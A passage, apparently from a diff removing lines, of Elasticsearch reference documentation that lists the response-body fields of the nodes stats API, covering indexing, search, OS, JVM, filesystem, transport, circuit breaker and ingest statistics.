-similar activities. A value of `-1` indicates that this is not available. -======= - -`indexing`:: -(object) -Contains statistics about indexing operations for the node. -+ -.Properties of `indexing` -[%collapsible%open] -======= -`index_total`:: -(integer) -Total number of indexing operations. - -`index_time`:: -(<>) -Total time spent performing indexing operations. - -`index_time_in_millis`:: -(integer) -Total time in milliseconds -spent performing indexing operations. - -`index_current`:: -(integer) -Number of indexing operations currently running. - -`index_failed`:: -(integer) -Number of failed indexing operations. - -`delete_total`:: -(integer) -Total number of deletion operations. - -`delete_time`:: -(<>) -Time spent performing deletion operations. - -`delete_time_in_millis`:: -(integer) -Time in milliseconds -spent performing deletion operations. - -`delete_current`:: -(integer) -Number of deletion operations currently running. - -`noop_update_total`:: -(integer) -Total number of noop operations. - -`is_throttled`:: -(Boolean) -Number of times -operations were throttled. - -`throttle_time`:: -(<>) -Total time spent throttling operations. - -`throttle_time_in_millis`:: -(integer) -Total time in milliseconds -spent throttling operations. -======= - -`get`:: -(object) -Contains statistics about get operations for the node. -+ -.Properties of `get` -[%collapsible%open] -======= -`total`:: -(integer) -Total number of get operations. - -`getTime`:: -(<>) -Time spent performing get operations. - -`time_in_millis`:: -(integer) -Time in milliseconds -spent performing get operations. - -`exists_total`:: -(integer) -Total number of successful get operations. - -`exists_time`:: -(<>) -Time spent performing successful get operations. - -`exists_time_in_millis`:: -(integer) -Time in milliseconds -spent performing successful get operations. - -`missing_total`:: -(integer) -Total number of failed get operations. - -`missing_time`:: -(<>) -Time spent performing failed get operations. - -`missing_time_in_millis`:: -(integer) -Time in milliseconds -spent performing failed get operations. - -`current`:: -(integer) -Number of get operations currently running. -======= - -`search`:: -(object) -Contains statistics about search operations for the node. -+ -.Properties of `search` -[%collapsible%open] -======= -`open_contexts`:: -(integer) -Number of open search contexts. - -`query_total`:: -(integer) -Total number of query operations. - -`query_time`:: -(<>) -Time spent performing query operations. - -`query_time_in_millis`:: -(integer) -Time in milliseconds -spent performing query operations. - -`query_current`:: -(integer) -Number of query operations currently running. - -`fetch_total`:: -(integer) -Total number of fetch operations. - -`fetch_time`:: -(<>) -Time spent performing fetch operations. - -`fetch_time_in_millis`:: -(integer) -Time in milliseconds -spent performing fetch operations. - -`fetch_current`:: -(integer) -Number of fetch operations currently running. - -`scroll_total`:: -(integer) -Total number of scroll operations. - -`scroll_time`:: -(<>) -Time spent performing scroll operations. - -`scroll_time_in_millis`:: -(integer) -Time in milliseconds -spent performing scroll operations. - -`scroll_current`:: -(integer) -Number of scroll operations currently running. - -`suggest_total`:: -(integer) -Total number of suggest operations. - -`suggest_time`:: -(<>) -Time spent performing suggest operations. - -`suggest_time_in_millis`:: -(integer) -Time in milliseconds -spent performing suggest operations. - -`suggest_current`:: -(integer) -Number of suggest operations currently running. -======= - -`merges`:: -(object) -Contains statistics about merge operations for the node. -+ -.Properties of `merges` -[%collapsible%open] -======= -`current`:: -(integer) -Number of merge operations currently running. - -`current_docs`:: -(integer) -Number of document merges currently running. - -`current_size`:: -(<>) -Memory used performing current document merges. - -`current_size_in_bytes`:: -(integer) -Memory, in bytes, used performing current document merges. - -`total`:: -(integer) -Total number of merge operations. - -`total_time`:: -(<>) -Total time spent performing merge operations. - -`total_time_in_millis`:: -(integer) -Total time in milliseconds -spent performing merge operations. - -`total_docs`:: -(integer) -Total number of merged documents. - -`total_size`:: -(<>) -Total size of document merges. - -`total_size_in_bytes`:: -(integer) -Total size of document merges in bytes. - -`total_stopped_time`:: -(<>) -Total time spent stopping merge operations. - -`total_stopped_time_in_millis`:: -(integer) -Total time in milliseconds -spent stopping merge operations. - -`total_throttled_time`:: -(<>) -Total time spent throttling merge operations. - -`total_throttled_time_in_millis`:: -(integer) -Total time in milliseconds -spent throttling merge operations. - -`total_auto_throttle`:: -(<>) -Size of automatically throttled merge operations. - -`total_auto_throttle_in_bytes`:: -(integer) -Size, in bytes, of automatically throttled merge operations. -======= - -`refresh`:: -(object) -Contains statistics about refresh operations for the node. -+ -.Properties of `refresh` -[%collapsible%open] -======= -`total`:: -(integer) -Total number of refresh operations. - -`total_time`:: -(<>) -Total time spent performing refresh operations. - -`total_time_in_millis`:: -(integer) -Total time in milliseconds -spent performing refresh operations. - -`external_total`:: -(integer) -Total number of external refresh operations. - -`external_total_time`:: -(<>) -Total time spent performing external operations. - -`external_total_time_in_millis`:: -(integer) -Total time in milliseconds -spent performing external operations. - -`listeners`:: -(integer) -Number of refresh listeners. -======= - -`flush`:: -(object) -Contains statistics about flush operations for the node. -+ -.Properties of `flush` -[%collapsible%open] -======= -`total`:: -(integer) -Number of flush operations. - -`periodic`:: -(integer) -Number of flush periodic operations. - -`total_time`:: -(<>) -Total time spent performing flush operations. - -`total_time_in_millis`:: -(integer) -Total time in milliseconds -spent performing flush operations. -======= - -`warmer`:: -(object) -Contains statistics about index warming operations for the node. -+ -.Properties of `warmer` -[%collapsible%open] -======= -`current`:: -(integer) -Number of active index warmers. - -`total`:: -(integer) -Total number of index warmers. - -`total_time`:: -(<>) -Total time spent performing index warming operations. - -`total_time_in_millis`:: -(integer) -Total time in milliseconds -spent performing index warming operations. -======= - -`query_cache`:: -(object) -Contains statistics about the query cache across all shards assigned to the -node. -+ -.Properties of `query_cache` -[%collapsible%open] -======= -`memory_size`:: -(<>) -Total amount of memory used for the query cache across all shards assigned to -the node. - -`memory_size_in_bytes`:: -(integer) -Total amount of memory, in bytes, used for the query cache across all shards -assigned to the node. - -`total_count`:: -(integer) -Total count of hits, misses, and cached queries -in the query cache. - -`hit_count`:: -(integer) -Number of query cache hits. - -`miss_count`:: -(integer) -Number of query cache misses. - -`cache_size`:: -(integer) -Size, in bytes, of the query cache. - -`cache_count`:: -(integer) -Count of queries -in the query cache. - -`evictions`:: -(integer) -Number of query cache evictions. -======= - -`fielddata`:: -(object) -Contains statistics about the field data cache across all shards -assigned to the node. -+ -.Properties of `fielddata` -[%collapsible%open] -======= -`memory_size`:: -(<>) -Total amount of memory used for the field data cache across all shards -assigned to the node. - -`memory_size_in_bytes`:: -(integer) -Total amount of memory, in bytes, used for the field data cache across all -shards assigned to the node. - -`evictions`:: -(integer) -Number of fielddata evictions. -======= - -`completion`:: -(object) -Contains statistics about completions across all shards assigned to the node. -+ -.Properties of `completion` -[%collapsible%open] -======= -`size`:: -(<>) -Total amount of memory used for completion across all shards assigned to -the node. - -`size_in_bytes`:: -(integer) -Total amount of memory, in bytes, used for completion across all shards assigned -to the node. -======= - -`segments`:: -(object) -Contains statistics about segments across all shards assigned to the node. -+ -.Properties of `segments` -[%collapsible%open] -======= -`count`:: -(integer) -Number of segments. - -`memory`:: -(<>) -Total amount of memory used for segments across all shards assigned to the -node. - -`memory_in_bytes`:: -(integer) -Total amount of memory, in bytes, used for segments across all shards assigned -to the node. - -`terms_memory`:: -(<>) -Total amount of memory used for terms across all shards assigned to the node. - -`terms_memory_in_bytes`:: -(integer) -Total amount of memory, in bytes, used for terms across all shards assigned to -the node. - -`stored_fields_memory`:: -(<>) -Total amount of memory used for stored fields across all shards assigned to -the node. - -`stored_fields_memory_in_bytes`:: -(integer) -Total amount of memory, in bytes, used for stored fields across all shards -assigned to the node. - -`term_vectors_memory`:: -(<>) -Total amount of memory used for term vectors across all shards assigned to -the node. - -`term_vectors_memory_in_bytes`:: -(integer) -Total amount of memory, in bytes, used for term vectors across all shards -assigned to the node. - -`norms_memory`:: -(<>) -Total amount of memory used for normalization factors across all shards assigned -to the node. - -`norms_memory_in_bytes`:: -(integer) -Total amount of memory, in bytes, used for normalization factors across all -shards assigned to the node. - -`points_memory`:: -(<>) -Total amount of memory used for points across all shards assigned to the node. - -`points_memory_in_bytes`:: -(integer) -Total amount of memory, in bytes, used for points across all shards assigned to -the node. - -`doc_values_memory`:: -(<>) -Total amount of memory used for doc values across all shards assigned to -the node. - -`doc_values_memory_in_bytes`:: -(integer) -Total amount of memory, in bytes, used for doc values across all shards assigned -to the node. - -`index_writer_memory`:: -(<>) -Total amount of memory used by all index writers across all shards assigned to -the node. - -`index_writer_memory_in_bytes`:: -(integer) -Total amount of memory, in bytes, used by all index writers across all shards -assigned to the node. - -`version_map_memory`:: -(<>) -Total amount of memory used by all version maps across all shards assigned to -the node. - -`version_map_memory_in_bytes`:: -(integer) -Total amount of memory, in bytes, used by all version maps across all shards -assigned to the node. - -`fixed_bit_set`:: -(<>) -Total amount of memory used by fixed bit sets across all shards assigned to -the node. -+ -Fixed bit sets are used for nested object field types and -type filters for <> fields. - -`fixed_bit_set_memory_in_bytes`:: -(integer) -Total amount of memory, in bytes, used by fixed bit sets across all shards -assigned to the node. -+ -Fixed bit sets are used for nested object field types and -type filters for <> fields. - -`max_unsafe_auto_id_timestamp`:: -(integer) -Time of the most recently retried indexing request. Recorded in milliseconds -since the {wikipedia}/Unix_time[Unix Epoch]. - -`file_sizes`:: -(object) -Contains statistics about the size of the segment file. -+ -.Properties of `file_sizes` -[%collapsible%open] -======== -`size`:: -(<>) -Size of the segment file. - -`size_in_bytes`:: -(integer) -Size, in bytes, -of the segment file. - -`description`:: -(string) -Description of the segment file. -======== -======= - -`translog`:: -(object) -Contains statistics about transaction log operations for the node. -+ -.Properties of `translog` -[%collapsible%open] -======= -`operations`:: -(integer) -Number of transaction log operations. - -`size`:: -(<>) -Size of the transaction log. - -`size_in_bytes`:: -(integer) -Size, in bytes, of the transaction log. - -`uncommitted_operations`:: -(integer) -Number of uncommitted transaction log operations. - -`uncommitted_size`:: -(<>) -Size of uncommitted transaction log operations. - -`uncommitted_size_in_bytes`:: -(integer) -Size, in bytes, of uncommitted transaction log operations. - -`earliest_last_modified_age`:: -(integer) -Earliest last modified age -for the transaction log. -======= - -`request_cache`:: -(object) -Contains statistics about the request cache across all shards assigned to the -node. -+ -.Properties of `request_cache` -[%collapsible%open] -======= -`memory_size`:: -(<>) -Memory used by the request cache. - -`memory_size_in_bytes`:: -(integer) -Memory, in bytes, used by the request cache. - -`evictions`:: -(integer) -Number of request cache operations. - -`hit_count`:: -(integer) -Number of request cache hits. - -`miss_count`:: -(integer) -Number of request cache misses. -======= - -`recovery`:: -(object) -Contains statistics about recovery operations for the node. -+ -.Properties of `recovery` -[%collapsible%open] -======= -`current_as_source`:: -(integer) -Number of recoveries -that used an index shard as a source. - -`current_as_target`:: -(integer) -Number of recoveries -that used an index shard as a target. - -`throttle_time`:: -(<>) -Time by which recovery operations were delayed due to throttling. - -`throttle_time_in_millis`:: -(integer) -Time in milliseconds -recovery operations were delayed due to throttling. -======= -====== - -[[cluster-nodes-stats-api-response-body-os]] -`os`:: -(object) -Contains statistics about the operating system for the node. -+ -.Properties of `os` -[%collapsible%open] -====== -`timestamp`:: -(integer) -Last time the operating system statistics were refreshed. Recorded in -milliseconds since the {wikipedia}/Unix_time[Unix Epoch]. - -`cpu`:: -(object) -Contains statistics about CPU usage for the node. -+ -.Properties of `cpu` -[%collapsible%open] -======= -`percent`:: -(integer) -Recent CPU usage for the whole system, or `-1` if not supported. - -`load_average`:: -(object) -Contains statistics about load averages on the system. -+ -.Properties of `load_average` -[%collapsible%open] -======== -`1m`:: -(float) -One-minute load average on the system (field is not present if one-minute load -average is not available). - -`5m`:: -(float) -Five-minute load average on the system (field is not present if five-minute load -average is not available). - -`15m`:: -(float) -Fifteen-minute load average on the system (field is not present if -fifteen-minute load average is not available). -======== -======= - -`mem`:: -(object) -Contains statistics about memory usage for the node. -+ -.Properties of `mem` -[%collapsible%open] -======= -`total`:: -(<>) -Total amount of physical memory. - -`total_in_bytes`:: -(integer) -Total amount of physical memory in bytes. - -`free`:: -(<>) -Amount of free physical memory. - -`free_in_bytes`:: -(integer) -Amount of free physical memory in bytes. - -`used`:: -(<>) -Amount of used physical memory. - -`used_in_bytes`:: -(integer) -Amount of used physical memory in bytes. - -`free_percent`:: -(integer) -Percentage of free memory. - -`used_percent`:: -(integer) -Percentage of used memory. -======= - -`swap`:: -(object) -Contains statistics about swap space for the node. -+ -.Properties of `swap` -[%collapsible%open] -======= -`total`:: -(<>) -Total amount of swap space. - -`total_in_bytes`:: -(integer) -Total amount of swap space in bytes. - -`free`:: -(<>) -Amount of free swap space. - -`free_in_bytes`:: -(integer) -Amount of free swap space in bytes. - -`used`:: -(<>) -Amount of used swap space. - -`used_in_bytes`:: -(integer) -Amount of used swap space in bytes. -======= - -`cgroup` (Linux only):: -(object) -Contains cgroup statistics for the node. -+ -NOTE: For the cgroup stats to be visible, cgroups must be compiled into the -kernel, the `cpu` and `cpuacct` cgroup subsystems must be configured and stats -must be readable from `/sys/fs/cgroup/cpu` and `/sys/fs/cgroup/cpuacct`. -+ -.Properties of `cgroup` -[%collapsible%open] -======= - -`cpuacct` (Linux only):: -(object) -Contains statistics about `cpuacct` control group for the node. -+ -.Properties of `cpuacct` -[%collapsible%open] -======== -`control_group` (Linux only):: -(string) -The `cpuacct` control group to which the {es} process belongs. - -`usage_nanos` (Linux only):: -(integer) -The total CPU time (in nanoseconds) consumed by all tasks in the same cgroup -as the {es} process. -======== - -`cpu` (Linux only):: -(object) -Contains statistics about `cpu` control group for the node. -+ -.Properties of `cpu` -[%collapsible%open] -======== -`control_group` (Linux only):: -(string) -The `cpu` control group to which the {es} process belongs. - -`cfs_period_micros` (Linux only):: -(integer) -The period of time (in microseconds) for how regularly all tasks in the same -cgroup as the {es} process should have their access to CPU resources -reallocated. - -`cfs_quota_micros` (Linux only):: -(integer) -The total amount of time (in microseconds) for which all tasks in -the same cgroup as the {es} process can run during one period -`cfs_period_micros`. - -`stat` (Linux only):: -(object) -Contains CPU statistics for the node. -+ -.Properties of `stat` -[%collapsible%open] -========= -`number_of_elapsed_periods` (Linux only):: -(integer) -The number of reporting periods (as specified by -`cfs_period_micros`) that have elapsed. - -`number_of_times_throttled` (Linux only):: -(integer) -The number of times all tasks in the same cgroup as the {es} process have -been throttled. - -`time_throttled_nanos` (Linux only):: -(integer) -The total amount of time (in nanoseconds) for which all tasks in the same -cgroup as the {es} process have been throttled. -========= -======== - -`memory` (Linux only):: -(object) -Contains statistics about the `memory` control group for the node. -+ -.Properties of `memory` -[%collapsible%open] -======== -`control_group` (Linux only):: -(string) -The `memory` control group to which the {es} process belongs. - -`limit_in_bytes` (Linux only):: -(string) -The maximum amount of user memory (including file cache) allowed for all -tasks in the same cgroup as the {es} process. This value can be too big to -store in a `long`, so is returned as a string so that the value returned can -exactly match what the underlying operating system interface returns. Any -value that is too large to parse into a `long` almost certainly means no -limit has been set for the cgroup. - -`usage_in_bytes` (Linux only):: -(string) -The total current memory usage by processes in the cgroup (in bytes) by all -tasks in the same cgroup as the {es} process. This value is stored as a -string for consistency with `limit_in_bytes`. -======== -======= -====== - -[[cluster-nodes-stats-api-response-body-process]] -`process`:: -(object) -Contains process statistics for the node. -+ -.Properties of `process` -[%collapsible%open] -====== -`timestamp`:: -(integer) -Last time the statistics were refreshed. Recorded in milliseconds -since the {wikipedia}/Unix_time[Unix Epoch]. - -`open_file_descriptors`:: -(integer) -Number of opened file descriptors associated with the current or -`-1` if not supported. - -`max_file_descriptors`:: -(integer) -Maximum number of file descriptors allowed on the system, or `-1` if not -supported. - -`cpu`:: -(object) -Contains CPU statistics for the node. -+ -.Properties of `cpu` -[%collapsible%open] -======= -`percent`:: -(integer) -CPU usage in percent, or `-1` if not known at the time the stats are -computed. - -`total`:: -(<>) -CPU time used by the process on which the Java virtual machine is running. - -`total_in_millis`:: -(integer) -CPU time (in milliseconds) used by the process on which the Java virtual -machine is running, or `-1` if not supported. -======= - -`mem`:: -(object) -Contains virtual memory statistics for the node. -+ -.Properties of `mem` -[%collapsible%open] -======= -`total_virtual`:: -(<>) -Size of virtual memory that is guaranteed to be available to the -running process. - -`total_virtual_in_bytes`:: -(integer) -Size in bytes of virtual memory that is guaranteed to be available to the -running process. -======= -====== - -[[cluster-nodes-stats-api-response-body-jvm]] -`jvm`:: -(object) -Contains Java Virtual Machine (JVM) statistics for the node. -+ -.Properties of `jvm` -[%collapsible%open] -====== -`timestamp`:: -(integer) -Last time JVM statistics were refreshed. - -`uptime`:: -(<>) -JVM uptime. - -`uptime_in_millis`:: -(integer) -JVM uptime in milliseconds. - -`mem`:: -(object) -Contains JVM memory usage statistics for the node. -+ -.Properties of `mem` -[%collapsible%open] -======= -`heap_used`:: -(<>) -Memory currently in use by the heap. - -`heap_used_in_bytes`:: -(integer) -Memory, in bytes, currently in use by the heap. - -`heap_used_percent`:: -(integer) -Percentage of memory currently in use by the heap. - -`heap_committed`:: -(<>) -Amount of memory available for use by the heap. - -`heap_committed_in_bytes`:: -(integer) -Amount of memory, in bytes, available for use by the heap. - -`heap_max`:: -(<>) -Maximum amount of memory available for use by the heap. - -`heap_max_in_bytes`:: -(integer) -Maximum amount of memory, in bytes, available for use by the heap. - -`non_heap_used`:: -(<>) -Non-heap memory used. - -`non_heap_used_in_bytes`:: -(integer) -Non-heap memory used, in bytes. - -`non_heap_committed`:: -(<>) -Amount of non-heap memory available. - -`non_heap_committed_in_bytes`:: -(integer) -Amount of non-heap memory available, in bytes. - -`pools`:: -(object) -Contains statistics about heap memory usage for the node. -+ -.Properties of `pools` -[%collapsible%open] -======== - -`young`:: -(object) -Contains statistics about memory usage by the young generation heap for the -node. -+ -.Properties of `young` -[%collapsible%open] -========= -`used`:: -(<>) -Memory used by the young generation heap. - -`used_in_bytes`:: -(integer) -Memory, in bytes, used by the young generation heap. - -`max`:: -(<>) -Maximum amount of memory available for use by the young generation heap. - -`max_in_bytes`:: -(integer) -Maximum amount of memory, in bytes, available for use by the young generation -heap. - -`peak_used`:: -(<>) -Largest amount of memory historically used by the young generation heap. - -`peak_used_in_bytes`:: -(integer) -Largest amount of memory, in bytes, historically used by the young generation -heap. - -`peak_max`:: -(<>) -Largest amount of memory historically used by the young generation heap. - -`peak_max_in_bytes`:: -(integer) -Largest amount of memory, in bytes, historically used by the young generation -heap. -========= - -`survivor`:: -(object) -Contains statistics about memory usage by the survivor space for the node. -+ -.Properties of `survivor` -[%collapsible%open] -========= -`used`:: -(<>) -Memory used by the survivor space. - -`used_in_bytes`:: -(integer) -Memory, in bytes, used by the survivor space. - -`max`:: -(<>) -Maximum amount of memory available for use by the survivor space. - -`max_in_bytes`:: -(integer) -Maximum amount of memory, in bytes, available for use by the survivor space. - -`peak_used`:: -(<>) -Largest amount of memory historically used by the survivor space. - -`peak_used_in_bytes`:: -(integer) -Largest amount of memory, in bytes, historically used by the survivor space. - -`peak_max`:: -(<>) -Largest amount of memory historically used by the survivor space. - -`peak_max_in_bytes`:: -(integer) -Largest amount of memory, in bytes, historically used by the survivor space. -========= - -`old`:: -(object) -Contains statistics about memory usage by the old generation heap for the node. -+ -.Properties of `old` -[%collapsible%open] -========= -`used`:: -(<>) -Memory used by the old generation heap. - -`used_in_bytes`:: -(integer) -Memory, in bytes, used by the old generation heap. - -`max`:: -(<>) -Maximum amount of memory available for use by the old generation heap. - -`max_in_bytes`:: -(integer) -Maximum amount of memory, in bytes, available for use by the old generation -heap. - -`peak_used`:: -(<>) -Largest amount of memory historically used by the old generation heap. - -`peak_used_in_bytes`:: -(integer) -Largest amount of memory, in bytes, historically used by the old generation -heap. - -`peak_max`:: -(<>) -Highest memory limit historically available for use by the old generation heap. - -`peak_max_in_bytes`:: -(integer) -Highest memory limit, in bytes, historically available for use by the old -generation heap. -========= -======== -======= - -`threads`:: -(object) -Contains statistics about JVM thread usage for the node. -+ -.Properties of `threads` -[%collapsible%open] -======= -`count`:: -(integer) -Number of active threads in use by JVM. - -`peak_count`:: -(integer) -Highest number of threads used by JVM. -======= - -`gc`:: -(object) -Contains statistics about JVM garbage collectors for the node. -+ -.Properties of `gc` -[%collapsible%open] -======= -`collectors`:: -(object) -Contains statistics about JVM garbage collectors for the node. -+ -.Properties of `collectors` -[%collapsible%open] -======== -`young`:: -(object) -Contains statistics about JVM garbage collectors that collect young generation -objects for the node. -+ -.Properties of `young` -[%collapsible%open] -========= -`collection_count`:: -(integer) -Number of JVM garbage collectors that collect young generation objects. - -`collection_time`:: -(<>) -Total time spent by JVM collecting young generation objects. - -`collection_time_in_millis`:: -(integer) -Total time in milliseconds spent by JVM collecting young generation objects. -========= - -`old`:: -(object) -Contains statistics about JVM garbage collectors that collect old generation -objects for the node. -+ -.Properties of `old` -[%collapsible%open] -========= -`collection_count`:: -(integer) -Number of JVM garbage collectors that collect old generation objects. - -`collection_time`:: -(<>) -Total time spent by JVM collecting old generation objects. - -`collection_time_in_millis`:: -(integer) -Total time in milliseconds spent by JVM collecting old generation objects. -========= -======== -======= - -`buffer_pools`:: -(object) -Contains statistics about JVM buffer pools for the node. -+ -.Properties of `buffer_pools` -[%collapsible%open] -======= -`mapped`:: -(object) -Contains statistics about mapped JVM buffer pools for the node. -+ -.Properties of `mapped` -[%collapsible%open] -======== -`count`:: -(integer) -Number of mapped buffer pools. - -`used`:: -(<>) -Size of mapped buffer pools. - -`used_in_bytes`:: -(integer) -Size, in bytes, of mapped buffer pools. - -`total_capacity`:: -(<>) -Total capacity of mapped buffer pools. - -`total_capacity_in_bytes`:: -(integer) -Total capacity, in bytes, of mapped buffer pools. -======== - -`direct`:: -(object) -Contains statistics about direct JVM buffer pools for the node. -+ -.Properties of `direct` -[%collapsible%open] -======== -`count`:: -(integer) -Number of direct buffer pools. - -`used`:: -(<>) -Size of direct buffer pools. - -`used_in_bytes`:: -(integer) -Size, in bytes, of direct buffer pools. - -`total_capacity`:: -(<>) -Total capacity of direct buffer pools. - -`total_capacity_in_bytes`:: -(integer) -Total capacity, in bytes, of direct buffer pools. -======== -======= - -`classes`:: -(object) -Contains statistics about classes loaded by JVM for the node. -+ -.Properties of `classes` -[%collapsible%open] -======= -`current_loaded_count`:: -(integer) -Number of classes currently loaded by JVM. - -`total_loaded_count`:: -(integer) -Total number of classes loaded since the JVM started. - -`total_unloaded_count`:: -(integer) -Total number of classes unloaded since the JVM started. -======= -====== - -[[cluster-nodes-stats-api-response-body-threadpool]] -`thread_pool`:: -(object) -Contains thread pool statistics for the node -+ -.Properties of `thread_pool` -[%collapsible%open] -====== -``:: -(object) -Contains statistics about the thread pool for the node. -+ -.Properties of `` -[%collapsible%open] -======= -`threads`:: -(integer) -Number of threads in the thread pool. - -`queue`:: -(integer) -Number of tasks in queue for the thread pool. - -`active`:: -(integer) -Number of active threads in the thread pool. - -`rejected`:: -(integer) -Number of tasks rejected by the thread pool executor. - -`largest`:: -(integer) -Highest number of active threads in the thread pool. - -`completed`:: -(integer) -Number of tasks completed by the thread pool executor. -======= -====== - -[[cluster-nodes-stats-api-response-body-fs]] -`fs`:: -(object) -Contains file store statistics for the node. -+ -.Properties of `fs` -[%collapsible%open] -====== -`timestamp`:: -(integer) -Last time the file stores statistics were refreshed. Recorded in -milliseconds since the {wikipedia}/Unix_time[Unix Epoch]. - -`total`:: -(object) -Contains statistics for all file stores of the node. -+ -.Properties of `total` -[%collapsible%open] -======= -`total`:: -(<>) -Total size of all file stores. - -`total_in_bytes`:: -(integer) -Total size (in bytes) of all file stores. - -`free`:: -(<>) -Total unallocated disk space in all file stores. - -`free_in_bytes`:: -(integer) -Total number of unallocated bytes in all file stores. - -`available`:: -(<>) -Total disk space available to this Java virtual machine on all file -stores. Depending on OS or process level restrictions, this might appear -less than `free`. This is the actual amount of free disk -space the {es} node can utilise. - -`available_in_bytes`:: -(integer) -Total number of bytes available to this Java virtual machine on all file -stores. Depending on OS or process level restrictions, this might appear -less than `free_in_bytes`. This is the actual amount of free disk -space the {es} node can utilise. -======= - -[[cluster-nodes-stats-fs-data]] -`data`:: -(array of objects) -List of all file stores. -+ -.Properties of `data` -[%collapsible%open] -======= -`path`:: -(string) -Path to the file store. - -`mount`:: -(string) -Mount point of the file store (ex: /dev/sda2). - -`type`:: -(string) -Type of the file store (ex: ext4). - -`total`:: -(<>) -Total size of the file store. - -`total_in_bytes`:: -(integer) -Total size (in bytes) of the file store. - -`free`:: -(<>) -Total amount of unallocated disk space in the file store. - -`free_in_bytes`:: -(integer) -Total number of unallocated bytes in the file store. - -`available`:: -(<>) -Total amount of disk space available to this Java virtual machine on this file -store. - -`available_in_bytes`:: -(integer) -Total number of bytes available to this Java virtual machine on this file -store. -======= - -`io_stats` (Linux only):: -(objects) -Contains I/O statistics for the node. -+ -.Properties of `io_stats` -[%collapsible%open] -======= -`devices` (Linux only):: -(array) -Array of disk metrics for each device that is backing an {es} data path. -These disk metrics are probed periodically and averages between the last -probe and the current probe are computed. -+ -.Properties of `devices` -[%collapsible%open] -======== -`device_name` (Linux only):: -(string) -The Linux device name. - -`operations` (Linux only):: -(integer) -The total number of read and write operations for the device completed since -starting {es}. - -`read_operations` (Linux only):: -(integer) -The total number of read operations for the device completed since starting -{es}. - -`write_operations` (Linux only):: -(integer) -The total number of write operations for the device completed since starting -{es}. - -`read_kilobytes` (Linux only):: -(integer) -The total number of kilobytes read for the device since starting {es}. - -`write_kilobytes` (Linux only):: -(integer) -The total number of kilobytes written for the device since starting {es}. -======== - -`operations` (Linux only):: - (integer) - The total number of read and write operations across all devices used by - {es} completed since starting {es}. - -`read_operations` (Linux only):: - (integer) - The total number of read operations for across all devices used by {es} - completed since starting {es}. - -`write_operations` (Linux only):: - (integer) - The total number of write operations across all devices used by {es} - completed since starting {es}. - -`read_kilobytes` (Linux only):: - (integer) - The total number of kilobytes read across all devices used by {es} since - starting {es}. - -`write_kilobytes` (Linux only):: - (integer) - The total number of kilobytes written across all devices used by {es} since - starting {es}. -======= -====== - -[[cluster-nodes-stats-api-response-body-transport]] -`transport`:: -(object) -Contains transport statistics for the node. -+ -.Properties of `transport` -[%collapsible%open] -====== -`server_open`:: -(integer) -Current number of inbound TCP connections used for internal communication between nodes. - -`total_outbound_connections`:: -(integer) -The cumulative number of outbound transport connections that this node has -opened since it started. Each transport connection may comprise multiple TCP -connections but is only counted once in this statistic. Transport connections -are typically <> so this statistic should -remain constant in a stable cluster. - -`rx_count`:: -(integer) -Total number of RX (receive) packets received by the node during internal -cluster communication. - -`rx_size`:: -(<>) -Size of RX packets received by the node during internal cluster communication. - -`rx_size_in_bytes`:: -(integer) -Size, in bytes, of RX packets received by the node during internal cluster -communication. - -`tx_count`:: -(integer) -Total number of TX (transmit) packets sent by the node during internal cluster -communication. - -`tx_size`:: -(<>) -Size of TX packets sent by the node during internal cluster communication. - -`tx_size_in_bytes`:: -(integer) -Size, in bytes, of TX packets sent by the node during internal cluster -communication. -====== - -[[cluster-nodes-stats-api-response-body-http]] -`http`:: -(object) -Contains http statistics for the node. -+ -.Properties of `http` -[%collapsible%open] -====== -`current_open`:: -(integer) -Current number of open HTTP connections for the node. - -`total_opened`:: -(integer) -Total number of HTTP connections opened for the node. -====== - -[[cluster-nodes-stats-api-response-body-breakers]] -`breakers`:: -(object) -Contains circuit breaker statistics for the node. -+ -.Properties of `breakers` -[%collapsible%open] -====== -``:: -(object) -Contains statistics for the circuit breaker. -+ -.Properties of `` -[%collapsible%open] -======= -`limit_size_in_bytes`:: -(integer) -Memory limit, in bytes, for the circuit breaker. - -`limit_size`:: -(<>) -Memory limit for the circuit breaker. - -`estimated_size_in_bytes`:: -(integer) -Estimated memory used, in bytes, for the operation. - -`estimated_size`:: -(<>) -Estimated memory used for the operation. - -`overhead`:: -(float) -A constant that all estimates for the circuit breaker are multiplied with to -calculate a final estimate. - -`tripped`:: -(integer) -Total number of times the circuit breaker has been triggered and prevented an -out of memory error. -======= -====== - -[[cluster-nodes-stats-api-response-body-script]] -`script`:: -(object) -Contains script statistics for the node. -+ -.Properties of `script` -[%collapsible%open] -====== -`compilations`:: -(integer) -Total number of inline script compilations performed by the node. - -`cache_evictions`:: -(integer) -Total number of times the script cache has evicted old data. - -`compilation_limit_triggered`:: -(integer) -Total number of times the <> circuit breaker has limited inline script compilations. -====== - -[[cluster-nodes-stats-api-response-body-discovery]] -`discovery`:: -(object) -Contains node discovery statistics for the node. -+ -.Properties of `discovery` -[%collapsible%open] -====== -`cluster_state_queue`:: -(object) -Contains statistics for the cluster state queue of the node. -+ -.Properties of `cluster_state_queue` -[%collapsible%open] -======= -`total`:: -(integer) -Total number of cluster states in queue. - -`pending`:: -(integer) -Number of pending cluster states in queue. - -`committed`:: -(integer) -Number of committed cluster states in queue. -======= - -`published_cluster_states`:: -(object) -Contains statistics for the published cluster states of the node. -+ -.Properties of `published_cluster_states` -[%collapsible%open] -======= -`full_states`:: -(integer) -Number of published cluster states. - -`incompatible_diffs`:: -(integer) -Number of incompatible differences between published cluster states. - -`compatible_diffs`:: -(integer) -Number of compatible differences between published cluster states. -======= -====== - -[[cluster-nodes-stats-api-response-body-ingest]] -`ingest`:: -(object) -Contains ingest statistics for the node. -+ -.Properties of `ingest` -[%collapsible%open] -====== -`total`:: -(object) -Contains statistics about ingest operations for the node. -+ -.Properties of `total` -[%collapsible%open] -======= -`count`:: -(integer) -Total number of documents ingested during the lifetime of this node. - -`time`:: -(<>) -Total time spent preprocessing ingest documents during the lifetime of this -node. - -`time_in_millis`:: -(integer) -Total time, in milliseconds, spent preprocessing ingest documents during the -lifetime of this node. - -`current`:: -(integer) -Total number of documents currently being ingested. - -`failed`:: -(integer) -Total number of failed ingest operations during the lifetime of this node. -======= - -`pipelines`:: -(object) -Contains statistics about ingest pipelines for the node. -+ -.Properties of `pipelines` -[%collapsible%open] -======= -``:: -(object) -Contains statistics about the ingest pipeline. -+ -.Properties of `` -[%collapsible%open] -======== -`count`:: -(integer) -Number of documents preprocessed by the ingest pipeline. - -`time`:: -(<>) -Total time spent preprocessing documents in the ingest pipeline. - -`time_in_millis`:: -(integer) -Total time, in milliseconds, spent preprocessing documents in the ingest -pipeline. - -`failed`:: -(integer) -Total number of failed operations for the ingest pipeline. - -`processors`:: -(array of objects) -Contains statistics for the ingest processors for the ingest pipeline. 